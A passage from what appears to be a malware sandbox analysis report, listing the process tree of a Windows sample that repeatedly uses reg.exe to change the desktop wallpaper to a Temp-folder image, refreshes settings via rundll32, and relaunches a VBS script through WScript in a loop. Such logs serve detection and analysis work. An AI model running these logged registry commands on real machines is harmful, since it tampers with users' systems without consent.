        5⤵
        
        PID:4132
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2112
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4236
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3484
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3740
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:3592
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:432
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4104
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4100
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4652
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2480
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:1180
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4528
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2992
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1436
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3856
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1068
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4704
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4620
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3380
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2288
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3900
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1972
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:3424
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4408
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3684
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1560
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3432
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:640
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:3140
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:560
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:116
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5036
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2264
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4924
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2272
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2888
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3092
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1528
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:2476
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4156
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3160
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2112
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3688
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3736
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4692
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3740
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4104
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4100
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4652
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1836
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4528
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2992
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2700
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2900
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1888
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3380
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:1304
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4356
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2256
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1104
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3432
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:640
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4932
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:448
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5036
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3860
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1092
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:2272
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4624
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3360
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4476
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1636
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3568
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:3572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3732
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2336
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3248
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3108
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3740
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4076
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4228
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2872
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1476
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3060
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2900
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:2004
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:1972
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3684
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4068
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:552
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1632
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4684
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5036
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4372
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3092
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3360
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4476
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:1636
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3568
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4516
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2356
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:432
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2920
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4792
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2992
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3060
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4444
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1304
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4272
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4068
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3432
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:1632
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4372
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1528
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3360
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4476
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2336
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2356
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:432
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3740
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2872
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:1888
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4408
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3144
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3888
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4044
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4624
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4156
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:1528
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:1916
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2356
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4104
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2920
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4432
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4408
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2264
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1632
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3092
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4236
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:3872
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2356
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3740
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4440
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3888
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4044
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5040
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4384
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4104
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3432
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1092
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4784
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:1528
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3740
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3888
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4044
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4104
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1092
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:3832
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3740
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4104
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1632
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3740
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1632
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:1220
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5124
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5144
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5156
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5172
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5184
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5200
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5216
    - - C:\Windows\system32\reg.exe
        
